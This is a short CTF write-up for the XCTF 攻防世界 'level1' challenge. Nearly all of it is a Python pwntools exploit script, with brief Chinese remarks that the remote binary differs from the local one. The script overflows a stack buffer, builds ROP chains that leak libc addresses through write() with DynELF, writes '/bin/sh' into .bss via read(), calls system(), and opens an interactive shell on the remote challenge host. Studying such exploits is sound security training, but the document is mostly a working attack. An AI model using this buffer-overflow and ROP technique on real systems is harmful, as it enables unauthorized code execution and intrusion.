xctf攻防世界_level1——本地和远程程序不一样

#-*-coding:utf-8 -*-
import pwn
from pwn import *
#pwn.context.log_level = 'debug'

#context(arch = 'i386', os = 'linux')
#shellcode = asm(shellcraft.sh())#用函数shellcraft.sh()直接生成shellcode
#asm
#io = process('./level1')
io = remote('111.198.29.45', 52614)

elf=ELF('./level1')

write_plt=elf.symbols['write']
write_got=elf.got['write']
read_plt=elf.symbols['read']
bss=elf.bss()
start=0x08048380
main=0x080484B7 
def leak(address):
	payload='a'*(0x88+4)+p32(write_plt)+p32(start)+p32(1)+p32(address)+p32(4)
	#io.recvuntil("?\n") #本地和远程有区别，请注意这里！
	io.send(payload)
	leaked=io.recv(4)
	print "[%s] -> [%s] = [%s]" % (hex(address),hex(u32(leaked)),repr(leaked))
	return leaked
d=pwn.DynELF(leak,elf=ELF('./level1'))
system=d.lookup('system','libc')
print hex(system)
print
print hex(bss)
payload2='a'*(0x88+4)+p32(read_plt)+p32(0x08048549)+p32(0)+p32(bss)+p32(8)

payload2+=p32(system)+p32(0xdeadbeef)+p32(bss)
raw_input()
io.sendline(payload2)

io.send('/bin/sh\x00')

io.interactive()

本来是个简单的题（程序给出了buf地址），但是远程程序不一样，直接变成了无libc的PWN。